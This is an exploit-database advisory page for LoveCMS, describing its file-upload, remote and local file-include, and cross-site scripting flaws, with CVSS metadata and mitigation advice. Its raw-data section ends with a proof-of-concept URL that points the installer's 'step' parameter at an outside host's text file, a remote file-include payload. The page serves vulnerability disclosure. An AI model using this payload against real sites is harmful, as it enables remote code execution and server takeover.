header-logo
Suggest Exploit
vendor:
LoveCMS
by:
7.5
CVSS
HIGH
Arbitrary File Upload, Remote File Include, Local File Include, Cross-Site Scripting
CWE
Product Name: LoveCMS
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Multiple Input-Validation Vulnerabilities in LoveCMS

An attacker can steal authentication credentials, upload arbitrary PHP files, execute files on the vulnerable system, retrieve arbitrary files, and delete files on the server.

Mitigation:

Implement input validation and sanitize user input. Apply security patches and updates.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22675/info

LoveCMS is prone to multiple input-validation vulnerabilities, including an arbitrary-file-upload issue, a remote file-include issue, a local file-include issue, and a cross-site scripting issue.

An attacker can exploit these issues to steal cookie-based authentication credentials, upload an arbitrary PHP file, execute the file on the vulnerable computer in the context of the webserver process, retrieve arbitrary files from the vulnerable system in the context of the affected application, and delete arbitrary files on the server. 

http://www.example.com/lovecms/install/index.php?step=http://example2.com/boum.txt?